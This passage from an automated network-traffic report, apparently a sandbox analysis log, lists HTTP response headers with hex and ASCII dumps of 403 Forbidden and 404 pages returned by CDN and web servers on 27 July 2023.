6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 49f605a4-49f6-4887-bafd-daa21eaf668eCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pVWZTQntftozwvfijdE6uMhrOvXc3tbSvwksoNs%2BecR6v0nI%2FvsLKix7dSoDODlZyJzYfVTbJYLpj5zRmmRZ3plbFoc0BqQCVspBnqo8ifqftockYtR%2Faz5kOf5Q0zA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=154.000044Server: cloudflareCF-RAY: 7ed76d19982c3a94-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487581.90141351909113353X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:53:01 GMTX-Served-By: cache-lin2290027-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4LpB1e4fStpawOReABU4/eI,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:53:17 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BmyqYkoiJlI0I56APDLklFOP7EPSNk5npkoMwW94%2F6GTYWHdfReMmRpY5ujoANWtV9Vx3ZRr4t2qx6ACKpsS3F3uBl77Sb10Ww5SCa7PbEibaN4FR7QXTce8GTRAI%2Bu1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76d1d5b142bba-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Clo
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:53:03 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Date: Thu, 27 Jul 2023 19:53:03 GMTX-Zen-Fury: fa42b62652342630c5926c78ae50e7e76e1bb4aaData Raw: 32 61 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 22 2c 20 31 36 39 30 34 38 37 35 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 35 3a 30 33 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2a8<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC47", 1690487548, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690487548 * 3.1415926535898; v = Math.floor(v); document.c
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:03 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FTJp2utoqqDlOUL1zGZwzTxYATDu9L8IoXhvtPFFiwKm6jioBsKFwr3hjebqy3nMEPkA2GYSsilH6%2BEknnDosQvdy9qlhy9n8a%2BZMrBnBkc4QCeC%2B%2BPkvUmVh4L7UJYX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76d273f88904f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:03 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SZ6%2F9BGeG40oOE2QspMQTM0jypCJfnVPHNyhxHCnToEYakBBcEoRCakwMhsLKGha6Y%2FW1vW9hkGDDy1gahEiyrgJrwviwq5YF9jFmMbznm2g0kVrtSBOKtRh%2B%2F37voxM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76d276fbd904f-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:04 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:04 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:05 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdYQrHtU+9G4PHzBHMB5kZ7,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1690487585.92140164253325480X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: ba6ebb6b-f112-4821-b2c8-74e0ebec8c23CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YlGOeHWR3VF8V8hosgXbvu4N2rp1lt3TaGDa87%2B%2F4uPe3oTrdFq2oqNEy3JCGfyc5H6iDrmvzk322Gpifewi7trLvkvb%2BEQTwhSlYnKYwr2n%2FL%2BR7Ca99kf9iQpv5UJ9vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=155.999899Server: cloudflareCF-RAY: 7ed76d3dc94c2bf8-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:52:57 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Cache-Status: Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 01ead5d2e22f520056f277caf7e1b2110dd1f7a8Date: Thu, 27 Jul 2023 19:53:09 GMTData Raw: 32 61 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 37 22 2c 20 31 36 39 30 34 38 37 35 34 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 37 35 34 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 39 39 36 34 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 35 35 3a 30 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 